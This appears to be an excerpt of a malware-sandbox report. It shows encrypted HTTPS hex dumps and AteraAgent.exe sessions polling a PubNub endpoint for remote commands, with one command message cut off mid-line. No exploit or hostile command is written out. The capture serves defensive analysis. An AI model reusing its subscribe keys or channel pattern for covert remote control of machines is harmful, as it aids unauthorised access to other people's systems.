                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 04 a8 e7 88 f5 07 53 81 9c 78 c1 86 56 67 d7 e3 3e 65 8f 8a 20 95 24 01 1a 78 dc 3b 8c f6 cb bf 8a 58 96 b4 7b d9 d4 c5 fd 52 35 25 1e 6e 95 ac fb 39 42 83 ab 8d 60 c7 4b f4 ea e5 9a aa 04 b5 5e 50 e0 bc b0 9c f4 e2 da 4b 89 f9 e6 c0 2c 64 bb 3e 61 fe d5 aa 55 57 e5 c9 81 16 af 3e 2a 52 fe 2d 97 48 5c 95 df 32 5f 00 d5 5b 2b 91 84 d0 6c 17 35 6a 27 0b 21 bc 76 03 d5 dd 15 07 b4 cf 12 7f c7 20 b5 df 70 4a 8d a7 cc 70 c4 35 ff 48 d8 03 5a 6b 0c 09 07 fa 34 ec 01 2c d5 28 e0 98 69 88 3c 7d 83 4b e0 e6 79 39 de 0f 67 a7 3a c2 0f a6 63 27 95 23 9d ef 87 67 16 f9 bf 4e 9e ec ed 35 d0 24 f5 ca 5b f5 b1 4d 9b 0b df e3 ba e8 49 d5 cb b4 14 07 52 e4 fc d8 ac ed 5a 1b b8 e3 21 60 cf ab 79 05 c5 3a 6e c2 29 d7 04 b7 e5 86 2b df f3 4b 1c 6c a0 83 2c c5 3a c7 60 49 86
                                                                                                                                                                                                                                                                          Data Ascii: SxVg>e $x;X{R5%n9B`K^PK,d>aUW>*R-H\2_[+l5j'!v pJp5HZk4,(i<}Ky9g:c'#gN5$[MIRZ!`y:n)+Kl,:`I
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: e9 e9 ba ed c4 8d b4 a2 18 0b e6 29 a1 31 bd 29 68 ff b2 29 0d f4 9e 88 4f dc 40 e7 d2 2c 27 45 36 11 f6 51 76 f3 e3 84 b5 db c7 d0 db 41 03 92 6d 3c 57 05 38 0f 9c ea d8 fb 45 b6 6b 1d b8 f7 f8 0a 30 bd 59 bf 9f e0 f8 74 f7 7f 97 82 6b 08 27 a6 df 7c 70 8c 3c eb 33 32 84 58 c8 2f cb a3 95 e5 ac 73 0c 03 ed 7e 08 3b 4a da 3a ca 9a a3 80 fa 21 db 0c c8 43 f3 d7 48 9e 09 37 fb 20 6b c2 74 45 5a 2c 15 64 d1 78 a7 81 c5 48 92 9d 57 92 bb d9 7d 8b dd bb ab f8 6a 33 e3 ab c1 11 f6 ea ea 0e 31 66 f2 20 ab 8c 78 e3 17 61 fc 61 31 30 b0 c7 c3 f5 ff 98 41 0d 09 ec 91 00 23 9f f0 d1 da cf 26 c3 bc 37 46 f6 74 70 5f 89 3c 5a 4b d6 73 d8 02 69 2e fd 33 3d 01 ba 4b 39 b0 62 61 2f 6b 17 f8 5e fb a7 76 4c f9 df 3e 40 2d 71 22 e1 6b 6e ec 60 76 7b e4 10 b3 7d c5 cb bb e0
                                                                                                                                                                                                                                                                          Data Ascii: )1)h)O@,'E6QvAm<W8Ek0Ytk'|p<32X/s~;J:!CH7 ktEZ,dxHW}j31f xaa10A#&7Ftp_<ZKsi.3=K9ba/k^vL>@-q"kn`v{}
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: ef 59 e7 b5 d4 2d a5 19 af 19 41 6d e4 b3 45 8e 60 3a ee 10 2a fa 7c 74 0a d9 63 56 6a 08 09 b1 c4 03 73 4f da fd 93 a0 94 f5 11 4c d2 45 70 db 4c bc 69 8b 1e 6b fa eb cd b3 f9 cb 54 60 eb 8a 65 5c 11 30 7f 36 07 ed 5f 7d ca 6d d1 91 c1 ec 00 c9 99 3b c2 a9 5b 80 60 56 a7 64 21 3e 27 e7 09 b0 32 70 7e 45 c2 f4 88 49 68 02 d3 06 53 a0 b0 88 c6 2a d2 f1 df 48 21 52 c8 13 75 00 49 f0 90 7c 84 e2 df 44 8a 24 2b b0 60 f4 19 62 a3 91 8d a6 fa b4 45 dc a2 7e a6 bf b3 0f 86 bb 0f 38 c4 b8 d9 bf bc a9 82 68 45 b7 0c 72 23 28 e2 bb d5 9f f6 b0 a2 c1 16 37 9b 70 c2 2d 91 09 50 07 57 d6 55 09 38 95 d3 07 b5 ce ca a7 96 2c 04 3a b1 b7 3a dc c9 f3 34 82 da fd 56 11 d4 07 c1 54 b2 08 d1 6f ae 58 3f 76 49 d8 6d be e6 b5 d3 46 1e 5d e5 40 70 4e 56 fe ab 8d 67 e2 e7 e9 f7
                                                                                                                                                                                                                                                                          Data Ascii: Y-AmE`:*|tcVjsOLEpLikT`e\06_}m;[`Vd!>'2p~EIhS*H!RuI|D$+`bE~8hEr#(7p-PWU8,::4VToX?vImF]@pNVg
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 5b e9 d9 88 51 38 2b 38 71 0f 11 b2 27 2f 44 7f 60 60 8d 72 a4 62 c5 2a 5c ac 25 5e 3f 6d 8f eb 87 2d c5 18 ef 66 85 57 aa 78 15 50 c4 bb f0 5d 23 ae 65 44 1d 14 30 54 7c 8a e6 cb d3 fa 0e 22 ab 72 24 19 73 c0 a7 17 0b bc 47 5a 02 7c 7c 63 82 4d e1 a9 f0 18 15 f8 3f 8c 25 61 18 f8 dc 21 3c 8a db 59 be fd de f9 ea 0e 6c a1 e7 cc 44 86 43 4d 9e 05 3d 8b 7b 6e 0b bd 78 45 8d ab 6c b2 e2 b3 38 95 92 af f9 1d 96 9c 8a dd cf 0e cd 7a 23 27 92 1b 6d bf 42 d4 54 fc 4e 89 83 aa f6 b9 70 14 72 32 b7 3c 81 29 56 b4 f1 ab 7d 70 e1 40 4f 94 51 05 f8 86 45 91 68 44 5b 42 42 3d ef 38 93 68 3f 8e 52 be ad 3e f6 61 5f 53 d4 23 b4 37 5d 8c 45 ba 5d c8 95 27 56 e0 3d ec 9c 74 dd 39 43 e3 87 88 ae cb 0a 89 09 db e0 67 39 ec 65 48 0c fa 71 59 85 7c 33 50 a6 61 43 d3 15 55 b5
                                                                                                                                                                                                                                                                          Data Ascii: [Q8+8q'/D``rb*\%^?m-fWxP]#eD0T|"r$sGZ||cM?%a!<YlDCM={nxEl8z#'mBTNpr2<)V}p@OQEhD[BB=8h?R>a_S#7]E]'V=t9Cg9eHqY|3PaCU
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 95 5a f8 21 2b c6 53 b1 27 a2 9b ad 52 c5 f4 bf e4 f4 40 fb 48 02 4e ad ad 7b 11 51 e6 13 2a ee 68 e4 0b ee 68 1d 51 63 86 b0 9d 04 a0 36 8f 32 1b f3 8d fa a4 92 a5 b0 73 7b ae 9b e1 89 e1 69 12 b1 82 63 1a 90 4a ae 46 19 24 10 6e ce 20 32 33 a4 46 9a 6d 5d e2 64 95 52 a2 6b 77 b6 95 07 38 b5 a2 e6 8d 0b af d6 24 fc df e9 eb 20 d6 ba 78 c4 ac 63 9c 22 b9 0c 82 73 c1 1b b0 6b 47 d7 7b ed d3 9c 8c 51 e9 dc 1e a2 b8 b9 71 42 04 5f ba fd fb f2 d8 42 cc 38 4d 0f ed b2 52 4f 31 29 1a 3a 19 f6 a3 d3 ee 4a 3f 46 d2 81 51 b5 77 ae 08 6c b0 4b 37 2e aa 90 5e 23 ce a2 29 6b 1b a7 2d 88 c7 68 94 79 13 4d e8 51 92 a0 22 05 8d ef 04 3e 96 43 c8 e9 ee d4 e9 91 b1 9e e0 fb 30 06 76 54 62 de a1 51 91 50 5c 17 01 d5 17 ed 3a 2e c3 4e f9 7d d0 0f 25 70 62 9b bc be 29 b2 ef
                                                                                                                                                                                                                                                                          Data Ascii: Z!+S'R@HN{Q*hhQc62s{icJF$n 23Fm]dRkw8$ xc"skG{QqB_B8MRO1):J?FQwlK7.^#)k-hyMQ">C0vTbQP\:.N}%pb)
                                                                                                                                                                                                                                                                          2024-11-24 10:15:51 UTC16384INData Raw: 73 a3 f9 16 bd 2d b9 47 66 8f 40 af 07 9b db 84 3b d8 d4 2b 1c 29 7a 2e f3 35 e3 c2 e7 42 75 a5 41 e9 b1 48 d4 fa 48 b2 7a f5 4d 39 4b a9 82 55 57 1a e8 b9 7b de 2e c7 6c de 57 cf de 92 f5 e8 f0 d5 6e 12 bb c9 31 b6 32 6a 69 24 d8 69 21 33 af cc c2 5c fd c6 c6 20 09 57 8c e9 c1 d5 84 6e bb 60 d1 83 82 c7 da 8b f3 05 cc fe 0a 69 d3 e6 91 4c 3d ab 56 93 5b f4 58 5c 69 84 a5 0c eb 41 c6 61 95 6e 88 65 41 60 af 27 b8 2d fc d4 79 61 ec 84 fb ec 8b 8f 50 0e b2 d6 d2 18 83 af 21 61 0a 7b b3 58 2d 91 7a 34 ee 95 98 6a 33 a8 7a f0 02 dc 61 56 f3 ee 00 c8 91 57 51 41 fc f3 dd 14 99 2e a6 07 0e b3 30 5f 1f bb 1a ef 6b b1 f0 a7 d9 cc 46 6d d9 11 73 50 26 76 db a5 25 cc 82 f2 0a b5 2f 73 9e 81 e4 f4 ab 99 02 0b e4 73 e0 b8 28 46 84 d8 d8 e4 bc 41 f8 12 95 5d cf a2 d8
                                                                                                                                                                                                                                                                          Data Ascii: s-Gf@;+)z.5BuAHHzM9KUW{.lWn12ji$i!3\ Wn`iL=V[X\iAaneA`'-yaP!a{X-z4j3zaVWQA.0_kFmsP&v%/ss(FA]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          7192.168.2.74990013.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:35 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:35 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:35 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:35 UTC19INData Raw: 5b 31 37 33 32 34 34 33 33 39 35 37 32 34 32 37 37 31 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324433957242771]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          8192.168.2.74991013.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:38 UTC358OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c6f3c309-b378-4eb6-be20-6f03325c221f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:38 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:38 UTC55INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          9192.168.2.74993213.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:46 UTC362OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b22252c6-c37c-49ec-8023-03bf78fe353a&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          10192.168.2.74993113.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:46 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:46 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:46 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:46 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 30 36 36 30 34 30 39 38 32 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434066040982]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          11192.168.2.74995213.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:53 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2c&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:53 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:53 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:53 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 31 33 34 37 39 38 31 34 31 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434134798141]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          12192.168.2.74995013.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:53 UTC354OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=618f72e2-0dcf-4d40-b59c-d773fc1ae2ba&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:53 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:53 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 74
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:53 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          13192.168.2.74996313.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:56 UTC340OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=9cb19796-6c2e-41ce-9126-598ecc9d33d5&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:56 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:56 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:56 UTC45INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 30 33 35 34 30 30 38 31 34 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434035400814","r":31},"m":[]}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          14192.168.2.74997113.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:59 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:59 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:59 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:59 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 31 39 34 35 34 38 38 35 34 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434194548854]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          15192.168.2.74997213.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:16:59 UTC362OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=fe727902-1ef3-4552-afad-6178afa6c12c&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:16:59 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:16:59 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 1869
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:16:59 UTC1869INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 31 38 32 32 33 34 33 30 31 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 7b 22 61 22 3a 22 32 22 2c 22 66 22 3a 30 2c 22 69 22 3a 22 34 34 39 39 61 66 64 34 2d 32 63 37 63 2d 34 37 61 61 2d 39 32 63 37 2d 61 38 37 62 37 39 65 66 38 65 36 34 22 2c 22 70 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 31 38 32 32 33 34 33 30 31 22 2c 22 72 22 3a 32 35 7d 2c 22 6b 22 3a 22 73 75 62 2d 63 2d 61 30 32 63 65 63 61 38 2d 61 39 35 38 2d 31 31 65 35 2d 62 64 38 63 2d 30 36 31 39 66 38 39 34 35 61 34 66 22 2c 22 63 22 3a 22 32 30 39 34 66 34 39 37 2d 32 65 39 34 2d 34 32 66 30 2d 62 32 37 63 2d 61 64 64 37 65 33 37 37 61 39 64 32 22 2c 22 64 22 3a 7b 22 43 6f 6d 6d 61 6e 64 49 64 22 3a 22 32 30 39 66 37 62 65
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434182234301","r":31},"m":[{"a":"2","f":0,"i":"4499afd4-2c7c-47aa-92c7-a87b79ef8e64","p":{"t":"17324434182234301","r":25},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"209f7be


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          16192.168.2.74998013.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:02 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:02 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:02 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:02 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 32 32 36 36 32 32 30 33 30 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434226622030]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          17192.168.2.74998813.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:03 UTC354OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=4097a231-6804-42b7-a1c1-b63735fd2c43&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:04 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:04 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 74
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:04 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          18192.168.2.74999413.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:05 UTC340OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f5557641-16d5-42d0-befc-2c3fa49ec144&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
